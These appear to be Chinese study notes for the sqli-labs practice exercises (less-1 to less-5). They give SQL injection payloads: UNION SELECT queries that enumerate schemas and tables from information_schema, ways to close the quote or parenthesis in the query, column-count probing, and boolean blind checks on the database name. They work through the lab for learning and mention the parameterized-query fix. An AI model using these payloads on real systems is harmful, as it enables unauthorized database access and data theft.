库名 ?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+
表名 -1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-2
去掉单引号 ',其余同 less-1
库名 ?id=-1 union select 1,2,group_concat(schema_name)from information_schema.schemata--+
表名 -1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-3
源代码
Select login_name, select password from table where id= ('our input here')
输入被包在 ('...') 中,所以闭合时在单引号后再加上右圆括号即可。根本原因是输入被直接拼接进 SQL 语句;改用参数化查询后,这种闭合方式就不再起作用。
-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-4
输入” 出现You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") LIMIT 0,1' at line 1
判断闭合需要 ")(双引号加右圆括号);之所以能判断出来,是因为页面回显了 MySQL 的报错信息
-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--
less-5
单引号报错,双引号不报错,说明参数由单引号包裹
探测列数 1' order by 4--+
盲注先探测数据库长度 id=1' and (select length(database()) = 数字)--+
mysql> select length(database())=4;
+----------------------+
| length(database())=4 |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.00 sec)
判断内容 1' and (select mid(database(),第几位,1)='字母')--+(mid 的第二个参数是位置,等号右边才是要比较的字母)